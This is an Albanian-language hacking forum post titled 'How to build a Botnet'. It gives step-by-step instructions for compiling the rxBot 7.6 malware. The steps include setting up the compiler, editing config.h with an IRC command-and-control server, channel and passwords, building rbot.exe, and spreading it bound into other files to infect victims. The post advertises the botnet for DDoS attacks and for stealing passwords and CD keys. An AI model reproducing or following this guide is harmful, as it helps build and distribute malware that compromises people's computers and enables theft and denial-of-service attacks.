Mesa duket nuk jeni i regjistruar, kliko ne butonin Regjisrohu nqs dëshironi të bëheni pjesë e forumit tonë, per t'u regjistruar ju hargjoni maksimumi 1 min kohë. Me respekt Staffi. 
ForumPortaliCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimiChatBilardo

Share | 
 

 Si te ndertojme Botnet

Shko poshtë 
AutoriMesazh
NoIsY
Super moderator
Super moderator


Postimet : 454
Vendodhja : n'Kamenic
Puna / Hobi : Hacker

MesazhTitulli: Si te ndertojme Botnet   Wed Dec 16, 2009 6:11 am

Botnet mund te perdoret per gjithqka psh: Ddos, qe te gjeni password, cdkeys, qe te hapni site e shume gjera tjera ...

1. Se pari e instaloni kete C++ Compiliet

Download Microsoft Visual C++ 6.0 Standart Edition.

Shkarko

Instalojeni por mos harroni te regjistroheni.

Shkarkoni dhe instaloni Service Pack 6 per visual C++:

Shkarko

Me pas shkarkoni dhe instaloni Windows Platform SDK

Shkarko

.rar password: itzforblitz

2.Konfigurimi i C++ Compilier

Hapni Visual C++ Compilier 6.0 dhe shkoni

Tools>Options>Directories

Tani Browse ne kete direktorium dhe shtoni kete ne list:

(Klikoni ne pikat e boxit qe ti shtoni)

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\LIB3.Konfigurimi i Bot

Shkarkoni dhe depaketoni kete bot source:

Shkarko

Hapni filen config.h dhe editoni keta rreshta:

Ndryshoni qe kuotizuarat:
char password[] = "Bot_login_pass"; // passwordi i botit (psh. kompjuteri)
char server[] = "aenigma.gotd.org"; // serveri (psh. irc.efnet.net)
char serverpass[] = ""; // passwordi i serverit (zakonisht nuk eshte i nevojshem)
char channel[] = "#botz_channel"; // channel ne te cilin do te konektohet boti
char chanpass[] = "My channel_pass"; // passwordi i channelit
Te meposhtmet nuk ka nevoj te modifikohen vetem nese deshironi:
char server2[] = ""; // backup server
char channer12[] = ""; // backup channel
char chanpass2[] = ""; //backup channel pass


4.Ndertoni Bot-in tuaj:

1. Sigurohuni qe e keni te hapur Visual C++
2.Selektoni File/Open Workspace
3.Browse tek Rxbot 7.6 folder dhe hapeni rbot.dsw
4.Task i djath: rBot Files dhe click Build:5.rBot.exe do te jete ne Rxbot 7.6> Debug folder

Tani vetem e merrni kete fajll dhe e shperndani, ose e bashkoni me ndonje fajll tjeter me ndonje file binder.

Command list:

Shkarko

5. Tash duhet te shkarkoni mIRC dhe te kyceni ne serverin qe e dhate me heret ne konfigurimin e botit dhe aty jepni komandat.

Shkarko

Nese deshironi me shume bot source mund te gjeni sa te doni neper forume te ndryshme shqiptare e te huaja
__________________
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.deshira-juaj.tk/
 
Si te ndertojme Botnet
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Magjite e rrezikshme

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: HaCkinG-
Kërce tek: